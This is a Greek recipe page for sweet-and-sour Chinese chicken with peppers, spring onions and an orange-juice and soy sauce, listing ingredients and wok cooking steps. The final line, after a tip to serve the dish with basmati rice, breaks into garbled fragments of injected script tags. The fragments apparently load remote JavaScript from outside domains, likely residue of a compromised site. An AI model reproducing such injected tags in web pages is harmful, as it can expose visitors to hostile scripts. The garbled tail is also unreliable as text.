Μια συνταγή για γλυκόξινο κινέζικο κοτόπουλο με πολλά αλλά απλά υλικά, που θα σας οδηγήσει σε μια πανδαισία γεύσεων! Κυριαρχούν οι πιπεριές αλλά και ο χυμός πορτοκάλι.
Υλικά (Σερβίρει 4)
- 1 Κιλό κοτόπουλο στήθος
- 5 Κ. σούπας καλαμποκέλαιο
- 1 πιπεριά (πράσινη καυτερή ψιλοκομμένη)
- 2 πιπεριές (σε λωρίδες)
- 8 κρεμμυδάκια (φρέσκα ψιλοκομμένα)
- Για την σάλτσα
- 2 κ. σούπας Worcestershire sauce
- 4 κ. σούπας μαύρη σόγια σος ή 6 κ.σ Teriyaki sauce
- 4 κ. σούπας γλυκό κρασί ή σέρι
- 1 κ. γλυκού Ζάχαρη
- 1 φ. τσαγιού χυμό πορτοκαλιού
- 1 φ. τσαγιού Ζωμό κότας ( κύβος Κνορ)
- 1 κ. γλυκού σκόνη 5 Spices
Εκτέλεση συνταγής
Πλύνετε καλά το κοτόπουλο και κόψτε το σε μικρά κομματάκια.
Αλατοπιπερώστε τα.
Βάλτε το λάδι στο γουόκ ,να κάψει.
Σοτάρετε το κοτόπουλο 8’.
Προσθέστε τις πιπεριές,τα κρεμμυδάκια κ ανακατέψτε για 3’.
Αδειάστε μέσα όλα τα υλικά της σάλτσας κ ανακατέψτε καλά.
Αφήστε το κοτόπουλο να σιγοβράσει 30’ μέχρι να μείνει ελάχιστο ζουμί.
Καλή όρεξη.
Σημειώσεις συνταγής
Το κινέζικο κοτόπουλο ταιριάζει τέλεια με ρύζι Basmati!!___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >